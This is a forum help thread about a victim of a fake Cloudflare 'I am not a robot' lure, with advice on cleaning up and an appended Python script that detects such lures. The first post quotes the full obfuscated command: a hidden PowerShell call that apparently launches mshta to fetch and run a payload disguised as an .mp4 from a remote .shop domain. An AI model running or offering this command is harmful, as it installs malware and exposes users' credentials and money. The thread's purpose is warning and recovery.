I accidentally executed
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''
via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.
What should I do? Is a full system wipe necessary? Or can I remove it somehow?
If I need to do a system format, what about attached drives and other devices on the network?
As others have said, it’s a virus, it’s probably an infostealer. It might have some sort of persistence mechanism, so put your PC offline and use another one to change all of your passwords (email & bank ones first) and log out everywhere to invalidate tokens. If you’ve saved cards, freeze them, then wipe the PC that got infected and fresh install https://www.youtube.com/watch?v=HUR4QOHEurY
What is that supposed to do?
I’m not too sure. I think -w runs powershell silently?! I’m hoping someone can figure out the rest.
Well, that’s the neat part: the URL it presumably downloads and executes the first payload from has died, so no, unless you catch it when it’s live you can’t easily replicate what happened on your computer anywhere else. I have no clue what the PowerShell is doing, but hiding malware in a weird file or pretending it’s a different file type and then executing that file isn’t uncommon.
This example is likely an HTA polyglot. An actual MP4 is merged with a binary, basically. The MP4 will play as normal, but the powershell is responsible for execution of the malware.
I’m on Version 21H2, installed on 06-12-2024, OS build 19044.5608, Experience: Windows Feature Experience Pack 1000.19061.1000.0, if that’s relevant.
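
A triage sketch for the kind of command pasted in the first post, added here as an example and not written by anyone in the thread: it flags the traits visible in that line (odd-cased interpreter name, hidden-window flag, wildcarded path, media-extension URL, look-alike letters in the trailing comment). The sample string is constructed with a placeholder URL and ID, and the function names and extension list are assumptions.

```python
import re
import unicodedata

# Constructed sample modelled on the command in the thread. The URL is a
# placeholder and the ID is made up; neither is the value from the post.
SAMPLE = ("POwErsHeLL -w 1 & \\W*\\\\\\\\S*2\\\\\\\\m*ht*e "
          "https://example.invalid/1.mp4 # \u2705 ''\u0399 am n\u03bft a "
          "r\u03bfb\u03bft: Cl\u03bfudflare Verificati\u03bfn \u0399D: 000000''")

MEDIA_EXT = (".mp4", ".mp3", ".png", ".jpg", ".pdf")  # assumed, extend as needed
USUAL_CASING = ("powershell", "POWERSHELL", "PowerShell", "Powershell")


def scripts_in(text):
    """Alphabets (LATIN, GREEK, CYRILLIC, ...) of the letters in text."""
    return {unicodedata.name(c, "?").split()[0] for c in text if c.isalpha()}


def clickfix_indicators(cmd):
    """Return the lure traits found in one pasted command line."""
    hits = []
    code, _, comment = cmd.partition("#")  # '#' starts a PowerShell comment
    words = code.split()
    stem = words[0].split(".")[0] if words else ""
    if stem.lower() == "powershell" and stem not in USUAL_CASING:
        hits.append("odd-cased interpreter name")
    # -w is accepted as a prefix of -WindowStyle; 1 is the Hidden style
    m = re.search(r"\s-(w\w*)\s+(\w+)", code, re.I)
    if m and "windowstyle".startswith(m[1].lower()) and m[2].lower() in ("1", "hidden"):
        hits.append("hidden window")
    if re.search(r"\\[^\s\\]*\*", code):
        hits.append("wildcards in executable path")
    if re.search(r"\\{3,}", code):
        hits.append("run of repeated backslashes")
    url = re.search(r"https?://\S+", code)
    if url and url[0].lower().endswith(MEDIA_EXT):
        hits.append("URL with media extension passed to a program")
    if len(scripts_in(comment) & {"LATIN", "GREEK", "CYRILLIC"}) > 1:
        hits.append("mixed-script text in trailing comment")
    return hits


if __name__ == "__main__":
    for hit in clickfix_indicators(SAMPLE):
        print("-", hit)
```

A single hit such as the hidden-window flag also appears in legitimate admin scripts; it is the combination that marks a line for review.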


